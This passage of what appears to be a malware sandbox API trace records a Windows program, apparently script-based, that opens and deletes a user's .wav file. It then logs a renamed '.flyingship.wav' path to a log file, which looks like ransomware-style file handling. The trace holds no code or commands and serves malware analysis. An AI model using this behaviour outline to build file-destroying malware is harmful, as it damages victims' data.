hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.697] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.697] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.697] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.698] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.699] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.699] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.699] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\olqmc1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0187.700] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.700] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.700] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.700] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.700] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.701] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.701] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.701] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.701] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.701] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.701] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.701] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.701] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.701] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.701] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.701] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.701] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpFilePart=0x0) returned 0x40 [0187.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0x151a7400, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 0x90af58 [0187.702] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\olqmc1.wav")) returned 1 [0187.703] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0x151a7400, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 0 [0187.703] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.704] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.704] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.705] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.705] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.705] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.705] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.706] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.706] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.707] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.708] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x28a4, lpOverlapped=0x0) returned 1 [0187.708] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x28a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0187.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x9238c0 [0187.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\n", cchWideChar=78, lpMultiByteStr=0x9238c0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 78 [0187.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0187.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0187.709] WriteFile (in: hFile=0x158, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0187.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0187.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.709] CloseHandle (hObject=0x158) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.716] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.716] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 